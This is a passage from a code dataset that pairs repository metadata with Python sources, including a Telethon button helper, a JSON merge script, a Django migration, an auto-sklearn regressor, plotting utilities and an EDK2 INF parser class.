| [((27, 8, 27, 49), 'framework.Exploit.__init__', 'framework.Exploit.__init__', ({(27, 35, 27, 39): 'self', (27, 41, 27, 48): 'visible'}, {}), '(self, visible)', False, 'import framework\n'), ((45, 12, 45, 26), 'time.sleep', 'time.sleep', ({(45, 23, 45, 25): '(10)'}, {}), '(10)', False, 'import time\n')] |
HosseyNJF/Telethon | telethon/tl/custom/button.py | 0b0a1dc6a1a3f2fc8593526549889fba2884e8b8 | from .. import types
from ... import utils
class Button:
"""
.. note::
This class is used to **define** reply markups, e.g. when
sending a message or replying to events. When you access
`Message.buttons <telethon.tl.custom.message.Message.buttons>`
they are actually `MessageButton
<telethon.tl.custom.messagebutton.MessageButton>`,
so you might want to refer to that class instead.
Helper class to allow defining ``reply_markup`` when
sending a message with inline or keyboard buttons.
You should make use of the defined class methods to create button
instances instead making them yourself (i.e. don't do ``Button(...)``
but instead use methods line `Button.inline(...) <inline>` etc.
You can use `inline`, `switch_inline`, `url` and `auth`
together to create inline buttons (under the message).
You can use `text`, `request_location`, `request_phone` and `request_poll`
together to create a reply markup (replaces the user keyboard).
You can also configure the aspect of the reply with these.
The latest message with a reply markup will be the one shown to the user
(messages contain the buttons, not the chat itself).
You **cannot** mix the two type of buttons together,
and it will error if you try to do so.
The text for all buttons may be at most 142 characters.
If more characters are given, Telegram will cut the text
to 128 characters and add the ellipsis (…) character as
the 129.
"""
def __init__(self, button, *, resize, single_use, selective):
self.button = button
self.resize = resize
self.single_use = single_use
self.selective = selective
@staticmethod
def _is_inline(button):
"""
Returns `True` if the button belongs to an inline keyboard.
"""
return isinstance(button, (
types.KeyboardButtonCallback,
types.KeyboardButtonSwitchInline,
types.KeyboardButtonUrl,
types.InputKeyboardButtonUrlAuth
))
@staticmethod
def inline(text, data=None):
"""
Creates a new inline button with some payload data in it.
If `data` is omitted, the given `text` will be used as `data`.
In any case `data` should be either `bytes` or `str`.
Note that the given `data` must be less or equal to 64 bytes.
If more than 64 bytes are passed as data, ``ValueError`` is raised.
If you need to store more than 64 bytes, consider saving the real
data in a database and a reference to that data inside the button.
When the user clicks this button, `events.CallbackQuery
<telethon.events.callbackquery.CallbackQuery>` will trigger with the
same data that the button contained, so that you can determine which
button was pressed.
"""
if not data:
data = text.encode('utf-8')
elif not isinstance(data, (bytes, bytearray, memoryview)):
data = str(data).encode('utf-8')
if len(data) > 64:
raise ValueError('Too many bytes for the data')
return types.KeyboardButtonCallback(text, data)
@staticmethod
def switch_inline(text, query='', same_peer=False):
"""
Creates a new inline button to switch to inline query.
If `query` is given, it will be the default text to be used
when making the inline query.
If ``same_peer is True`` the inline query will directly be
set under the currently opened chat. Otherwise, the user will
have to select a different dialog to make the query.
When the user clicks this button, after a chat is selected, their
input field will be filled with the username of your bot followed
by the query text, ready to make inline queries.
"""
return types.KeyboardButtonSwitchInline(text, query, same_peer)
@staticmethod
def url(text, url=None):
"""
Creates a new inline button to open the desired URL on click.
If no `url` is given, the `text` will be used as said URL instead.
You cannot detect that the user clicked this button directly.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to open the displayed URL unless
the domain is trusted, and once confirmed the URL will open in their
device.
"""
return types.KeyboardButtonUrl(text, url or text)
@staticmethod
def auth(text, url=None, *, bot=None, write_access=False, fwd_text=None):
"""
Creates a new inline button to authorize the user at the given URL.
You should set the `url` to be on the same domain as the one configured
for the desired `bot` via `@BotFather <https://t.me/BotFather>`_ using
the ``/setdomain`` command.
For more information about letting the user login via Telegram to
a certain domain, see https://core.telegram.org/widgets/login.
If no `url` is specified, it will default to `text`.
Args:
bot (`hints.EntityLike`):
The bot that requires this authorization. By default, this
is the bot that is currently logged in (itself), although
you may pass a different input peer.
.. note::
For now, you cannot use ID or username for this argument.
If you want to use a different bot than the one currently
logged in, you must manually use `client.get_input_entity()
<telethon.client.users.UserMethods.get_input_entity>`.
write_access (`bool`):
Whether write access is required or not.
This is `False` by default (read-only access).
fwd_text (`str`):
The new text to show in the button if the message is
forwarded. By default, the button text will be the same.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to login to the specified domain.
"""
return types.InputKeyboardButtonUrlAuth(
text=text,
url=url or text,
bot=utils.get_input_user(bot or types.InputUserSelf()),
request_write_access=write_access,
fwd_text=fwd_text
)
@classmethod
def text(cls, text, *, resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button with the given text.
Args:
resize (`bool`):
If present, the entire keyboard will be reconfigured to
be resized and be smaller if there are not many buttons.
single_use (`bool`):
If present, the entire keyboard will be reconfigured to
be usable only once before it hides itself.
selective (`bool`):
If present, the entire keyboard will be reconfigured to
be "selective". The keyboard will be shown only to specific
users. It will target users that are @mentioned in the text
of the message or to the sender of the message you reply to.
When the user clicks this button, a text message with the same text
as the button will be sent, and can be handled with `events.NewMessage
<telethon.events.newmessage.NewMessage>`. You cannot distinguish
between a button press and the user typing and sending exactly the
same text on their own.
"""
return cls(types.KeyboardButton(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_location(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's location on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their location with the
bot, and if confirmed a message with geo media will be sent.
"""
return cls(types.KeyboardButtonRequestGeoLocation(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_phone(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's phone on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their phone with the
bot, and if confirmed a message with contact media will be sent.
"""
return cls(types.KeyboardButtonRequestPhone(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_poll(cls, text, *, force_quiz=False,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user to create a poll.
If `force_quiz` is `False`, the user will be allowed to choose whether
they want their poll to be a quiz or not. Otherwise, the user will be
forced to create a quiz when creating the poll.
If a poll is a quiz, there will be only one answer that is valid, and
the votes cannot be retracted. Otherwise, users can vote and retract
the vote, and the pol might be multiple choice.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a screen letting the user create a
poll will be shown, and if they do create one, the poll will be sent.
"""
return cls(types.KeyboardButtonRequestPoll(text, quiz=force_quiz),
resize=resize, single_use=single_use, selective=selective)
@staticmethod
def clear():
"""
Clears all keyboard buttons after sending a message with this markup.
When used, no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardHide()
@staticmethod
def force_reply():
"""
Forces a reply to the message with this markup. If used,
no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardForceReply()
| [] |
addUsername/javaBoring | src/main/resources/pys/join.py | d576adbd21447085f56719e8cc871faf94d8a369 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True) | [((31, 10, 31, 34), 'os.listdir', 'os.listdir', ({(31, 21, 31, 33): 'jsonPathTemp'}, {}), '(jsonPathTemp)', False, 'import os\n'), ((16, 15, 16, 30), 'json.load', 'json.load', ({(16, 25, 16, 29): 'file'}, {}), '(file)', False, 'import json\n'), ((20, 8, 20, 29), 'json.dump', 'json.dump', ({(20, 18, 20, 22): 'dicc', (20, 24, 20, 28): 'file'}, {}), '(dicc, file)', False, 'import json\n')] |
njmhendrix/grand-challenge.org | app/grandchallenge/challenges/migrations/0023_auto_20200123_1102.py | 9bc36f5e26561a78bd405e8ea5e4c0f86c95f011 | # Generated by Django 3.0.2 on 2020-01-23 11:02
import re
import django.contrib.postgres.fields.citext
import django.core.validators
from django.db import migrations
import grandchallenge.challenges.models
class Migration(migrations.Migration):
dependencies = [
("challenges", "0022_auto_20200121_1639"),
]
operations = [
migrations.AlterField(
model_name="challenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
migrations.AlterField(
model_name="externalchallenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
]
| [((29, 24, 29, 56), 're.compile', 're.compile', ({(29, 35, 29, 55): '"""^[-a-zA-Z0-9_]+\\\\Z"""'}, {}), "('^[-a-zA-Z0-9_]+\\\\Z')", False, 'import re\n'), ((47, 24, 47, 56), 're.compile', 're.compile', ({(47, 35, 47, 55): '"""^[-a-zA-Z0-9_]+\\\\Z"""'}, {}), "('^[-a-zA-Z0-9_]+\\\\Z')", False, 'import re\n')] |
hmendozap/master-arbeit-files | autosk_dev_test/component/LinReg.py | 5c1b90bc4a424313234b84bad405799de6f8d2ed | import numpy as np
import scipy.sparse as sp
from HPOlibConfigSpace.configuration_space import ConfigurationSpace
from HPOlibConfigSpace.conditions import EqualsCondition, InCondition
from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, Constant
from autosklearn.pipeline.components.base import AutoSklearnRegressionAlgorithm
from autosklearn.pipeline.constants import *
class LinReg(AutoSklearnRegressionAlgorithm):
def __init__(self, number_updates, batch_size, dropout_output,
learning_rate, solver, lambda2,
momentum=0.99, beta1=0.9, beta2=0.9, rho=0.95,
lr_policy='fixed', gamma=0.01, power=1.0, epoch_step=2,
random_state=None):
self.number_updates = number_updates
self.batch_size = batch_size
self.dropout_output = dropout_output
self.learning_rate = learning_rate
self.lr_policy = lr_policy
self.lambda2 = lambda2
self.momentum = momentum
self.beta1 = 1-beta1 if beta1 is not None else 0.9
self.beta2 = 1-beta2 if beta2 is not None else 0.99
self.rho = rho
self.solver = solver
self.gamma = gamma
self.power = power
self.epoch_step = epoch_step
# Empty features and shape
self.n_features = None
self.input_shape = None
self.m_issparse = False
self.m_isregression = True
self.m_isbinary = False
self.m_ismultilabel = False
self.estimator = None
def _prefit(self, X, y):
self.batch_size = int(self.batch_size)
self.n_features = X.shape[1]
self.input_shape = (self.batch_size, self.n_features)
self.num_output_units = 1 # Regression
# Normalize the output
self.mean_y = np.mean(y)
self.std_y = np.std(y)
y = (y - self.mean_y) / self.std_y
if len(y.shape) == 1:
y = y[:, np.newaxis]
self.m_issparse = sp.issparse(X)
return X, y
def fit(self, X, y):
Xf, yf = self._prefit(X, y)
epoch = (self.number_updates * self.batch_size)//X.shape[0]
number_epochs = min(max(2, epoch), 110) # Cap the max number of possible epochs
from implementation import LogisticRegression
self.estimator = LogisticRegression.LogisticRegression(batch_size=self.batch_size,
input_shape=self.input_shape,
num_output_units=self.num_output_units,
dropout_output=self.dropout_output,
learning_rate=self.learning_rate,
lr_policy=self.lr_policy,
lambda2=self.lambda2,
momentum=self.momentum,
beta1=self.beta1,
beta2=self.beta2,
rho=self.rho,
solver=self.solver,
num_epochs=number_epochs,
gamma=self.gamma,
power=self.power,
epoch_step=self.epoch_step,
is_sparse=self.m_issparse,
is_binary=self.m_isbinary,
is_multilabel=self.m_ismultilabel,
is_regression=self.m_isregression)
self.estimator.fit(Xf, yf)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
preds = self.estimator.predict(X, self.m_issparse)
return preds * self.std_y + self.mean_y
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
return self.estimator.predict_proba(X, self.m_issparse)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'lin_reg',
'name': 'Linear Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
policy_choices = ['fixed', 'inv', 'exp', 'step']
batch_size = UniformIntegerHyperparameter("batch_size",
100, 3000,
log=True,
default=150)
number_updates = UniformIntegerHyperparameter("number_updates",
500, 10500,
log=True,
default=500)
dropout_output = UniformFloatHyperparameter("dropout_output", 0.0, 0.99,
default=0.5)
lr = UniformFloatHyperparameter("learning_rate", 1e-6, 0.1,
log=True,
default=0.01)
l2 = UniformFloatHyperparameter("lambda2", 1e-6, 1e-2,
log=True,
default=1e-3)
solver = CategoricalHyperparameter(name="solver",
choices=["sgd", "adam"],
default="sgd")
beta1 = UniformFloatHyperparameter("beta1", 1e-4, 0.1,
log=True,
default=0.1)
beta2 = UniformFloatHyperparameter("beta2", 1e-4, 0.1,
log=True,
default=0.01)
lr_policy = CategoricalHyperparameter(name="lr_policy",
choices=policy_choices,
default='fixed')
gamma = UniformFloatHyperparameter(name="gamma",
lower=1e-3, upper=1e-1,
default=1e-2)
power = UniformFloatHyperparameter("power",
0.0, 1.0,
default=0.5)
epoch_step = UniformIntegerHyperparameter("epoch_step",
2, 20,
default=5)
cs = ConfigurationSpace()
cs.add_hyperparameter(number_updates)
cs.add_hyperparameter(batch_size)
cs.add_hyperparameter(dropout_output)
cs.add_hyperparameter(lr)
cs.add_hyperparameter(l2)
cs.add_hyperparameter(solver)
cs.add_hyperparameter(beta1)
cs.add_hyperparameter(beta2)
cs.add_hyperparameter(lr_policy)
cs.add_hyperparameter(gamma)
cs.add_hyperparameter(power)
cs.add_hyperparameter(epoch_step)
beta1_depends_on_solver = EqualsCondition(beta1, solver, "adam")
beta2_depends_on_solver = EqualsCondition(beta2, solver, "adam")
gamma_depends_on_policy = InCondition(child=gamma, parent=lr_policy,
values=['inv', 'exp', 'step'])
power_depends_on_policy = EqualsCondition(power, lr_policy, 'inv')
epoch_step_depends_on_policy = EqualsCondition(epoch_step,
lr_policy, 'step')
cs.add_condition(beta1_depends_on_solver)
cs.add_condition(beta2_depends_on_solver)
cs.add_condition(gamma_depends_on_policy)
cs.add_condition(power_depends_on_policy)
cs.add_condition(epoch_step_depends_on_policy)
return cs
| [((52, 22, 52, 32), 'numpy.mean', 'np.mean', ({(52, 30, 52, 31): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((53, 21, 53, 30), 'numpy.std', 'np.std', ({(53, 28, 53, 29): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((58, 26, 58, 40), 'scipy.sparse.issparse', 'sp.issparse', ({(58, 38, 58, 39): 'X'}, {}), '(X)', True, 'import scipy.sparse as sp\n'), ((70, 25, 89, 97), 'implementation.LogisticRegression.LogisticRegression', 'LogisticRegression.LogisticRegression', (), '', False, 'from implementation import LogisticRegression\n'), ((121, 21, 124, 62), 'HPOlibConfigSpace.hyperparameters.UniformIntegerHyperparameter', 'UniformIntegerHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((126, 25, 129, 66), 'HPOlibConfigSpace.hyperparameters.UniformIntegerHyperparameter', 'UniformIntegerHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((131, 25, 132, 64), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((134, 13, 136, 53), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((138, 13, 140, 53), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((142, 17, 144, 57), 'HPOlibConfigSpace.hyperparameters.CategoricalHyperparameter', 'CategoricalHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((146, 16, 148, 55), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((150, 16, 152, 56), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((154, 20, 156, 62), 'HPOlibConfigSpace.hyperparameters.CategoricalHyperparameter', 'CategoricalHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((158, 16, 160, 56), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((162, 16, 164, 55), 'HPOlibConfigSpace.hyperparameters.UniformFloatHyperparameter', 'UniformFloatHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((166, 21, 168, 60), 'HPOlibConfigSpace.hyperparameters.UniformIntegerHyperparameter', 'UniformIntegerHyperparameter', (), '', False, 'from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, UniformIntegerHyperparameter, CategoricalHyperparameter, Constant\n'), ((170, 13, 170, 33), 'HPOlibConfigSpace.configuration_space.ConfigurationSpace', 'ConfigurationSpace', ({}, {}), '()', False, 'from HPOlibConfigSpace.configuration_space import ConfigurationSpace\n'), ((184, 34, 184, 72), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(184, 50, 184, 55): 'beta1', (184, 57, 184, 63): 'solver', (184, 65, 184, 71): '"""adam"""'}, {}), "(beta1, solver, 'adam')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((185, 34, 185, 72), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(185, 50, 185, 55): 'beta2', (185, 57, 185, 63): 'solver', (185, 65, 185, 71): '"""adam"""'}, {}), "(beta2, solver, 'adam')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((186, 34, 187, 76), 'HPOlibConfigSpace.conditions.InCondition', 'InCondition', (), '', False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((188, 34, 188, 74), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(188, 50, 188, 55): 'power', (188, 57, 188, 66): 'lr_policy', (188, 68, 188, 73): '"""inv"""'}, {}), "(power, lr_policy, 'inv')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n'), ((189, 39, 190, 73), 'HPOlibConfigSpace.conditions.EqualsCondition', 'EqualsCondition', ({(189, 55, 189, 65): 'epoch_step', (190, 55, 190, 64): 'lr_policy', (190, 66, 190, 72): '"""step"""'}, {}), "(epoch_step, lr_policy, 'step')", False, 'from HPOlibConfigSpace.conditions import EqualsCondition, InCondition\n')] |
Elektra-2/python_crash_course_2nd | python_work/Chapter5/exe3_alien_color.py | 1c8beaddfe037faa3a36e7c384a6ea2f9d560060 | # Creating a elif chain
alien_color = 'red'
if alien_color == 'green':
print('Congratulations! You won 5 points!')
elif alien_color == 'yellow':
print('Congratulations! You won 10 points!')
elif alien_color == 'red':
print('Congratulations! You won 15 points!')
| [] |
larryzhang95/Voice-Analysis-Pipeline | DigiPsych_API/Data_Science_API/evaluate_model.py | 264ac5c70d0baab47b81718ea5b895be30a683e9 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
train_scores, test_scores = validation_curve(estimator, X, y, param_name, param_range, cv)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
| [((10, 46, 10, 69), 'numpy.linspace', 'np.linspace', ({(10, 58, 10, 60): '(0.1)', (10, 62, 10, 65): '(1.0)', (10, 67, 10, 68): '(5)'}, {}), '(0.1, 1.0, 5)', True, 'import numpy as np\n'), ((11, 4, 11, 16), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((12, 4, 12, 20), 'matplotlib.pyplot.title', 'plt.title', ({(12, 14, 12, 19): 'title'}, {}), '(title)', True, 'import matplotlib.pyplot as plt\n'), ((15, 4, 15, 35), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(15, 15, 15, 34): '"""Training examples"""'}, {}), "('Training examples')", True, 'import matplotlib.pyplot as plt\n'), ((16, 4, 16, 23), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(16, 15, 16, 22): '"""Score"""'}, {}), "('Score')", True, 'import matplotlib.pyplot as plt\n'), ((17, 45, 18, 71), 'sklearn.model_selection.learning_curve', 'learning_curve', (), '', False, 'from sklearn.model_selection import learning_curve\n'), ((19, 24, 19, 53), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((20, 23, 20, 51), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((21, 23, 21, 51), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((22, 22, 22, 49), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((23, 4, 23, 18), 'matplotlib.pyplot.grid', 'plt.grid', ({(23, 13, 23, 17): '(True)'}, {}), '(True)', True, 'import matplotlib.pyplot as plt\n'), ((25, 4, 27, 31), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((28, 4, 29, 78), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((30, 4, 31, 36), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((32, 4, 33, 38), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((35, 4, 35, 26), 'matplotlib.pyplot.legend', 'plt.legend', (), '', True, 'import matplotlib.pyplot as plt\n'), ((36, 4, 36, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((41, 46, 41, 69), 'numpy.linspace', 'np.linspace', ({(41, 58, 41, 60): '(0.1)', (41, 62, 41, 65): '(1.0)', (41, 67, 41, 68): '(5)'}, {}), '(0.1, 1.0, 5)', True, 'import numpy as np\n'), ((43, 17, 43, 46), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((44, 16, 44, 44), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((45, 16, 45, 44), 'numpy.mean', 'np.mean', (), '', True, 'import numpy as np\n'), ((46, 15, 46, 42), 'numpy.std', 'np.std', (), '', True, 'import numpy as np\n'), ((47, 4, 47, 98), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((48, 4, 48, 104), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((49, 4, 49, 115), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((50, 4, 50, 100), 'matplotlib.pyplot.fill_between', 'plt.fill_between', (), '', True, 'import matplotlib.pyplot as plt\n'), ((51, 4, 51, 18), 'matplotlib.pyplot.grid', 'plt.grid', ({(51, 13, 51, 17): '(True)'}, {}), '(True)', True, 'import matplotlib.pyplot as plt\n'), ((52, 4, 52, 21), 'matplotlib.pyplot.xscale', 'plt.xscale', ({(52, 15, 52, 20): '"""log"""'}, {}), "('log')", True, 'import matplotlib.pyplot as plt\n'), ((53, 4, 53, 26), 'matplotlib.pyplot.legend', 'plt.legend', (), '', True, 'import matplotlib.pyplot as plt\n'), ((54, 4, 54, 27), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(54, 15, 54, 26): '"""Parameter"""'}, {}), "('Parameter')", True, 'import matplotlib.pyplot as plt\n'), ((55, 4, 55, 23), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(55, 15, 55, 22): '"""Score"""'}, {}), "('Score')", True, 'import matplotlib.pyplot as plt\n'), ((56, 4, 56, 18), 'matplotlib.pyplot.ylim', 'plt.ylim', ({(56, 13, 56, 17): 'ylim'}, {}), '(ylim)', True, 'import matplotlib.pyplot as plt\n'), ((14, 8, 14, 23), 'matplotlib.pyplot.ylim', 'plt.ylim', ({(14, 17, 14, 22): '*ylim'}, {}), '(*ylim)', True, 'import matplotlib.pyplot as plt\n')] |
sremes/oomi | oomi/__init__.py | 312317aa2ef68f1481b2447652a7d47c5f2e3f56 | """Utilities for downloading comsumption data from Oomi."""
from oomi.oomi_downloader import OomiDownloader, OomiConfig
| [] |
KaoTuz/edk2-stable202108 | BaseTools/Source/Python/UPT/Object/Parser/InfMisc.py | 49d9306e7bf64b2f07d8473be1f2faea49d0a012 | ## @file
# This file is used to define class objects of INF file miscellaneous.
# Include BootMode/HOB/Event and others. It will consumed by InfParser.
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
'''
InfMisc
'''
import Logger.Log as Logger
from Logger import ToolError
from Library import DataType as DT
from Object.Parser.InfCommonObject import InfSectionCommonDef
from Library.Misc import Sdict
##
# BootModeObject
#
class InfBootModeObject():
def __init__(self):
self.SupportedBootModes = ''
self.HelpString = ''
self.Usage = ''
def SetSupportedBootModes(self, SupportedBootModes):
self.SupportedBootModes = SupportedBootModes
def GetSupportedBootModes(self):
return self.SupportedBootModes
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# EventObject
#
class InfEventObject():
def __init__(self):
self.EventType = ''
self.HelpString = ''
self.Usage = ''
def SetEventType(self, EventType):
self.EventType = EventType
def GetEventType(self):
return self.EventType
def SetHelpString(self, HelpString):
self.HelpString = HelpString
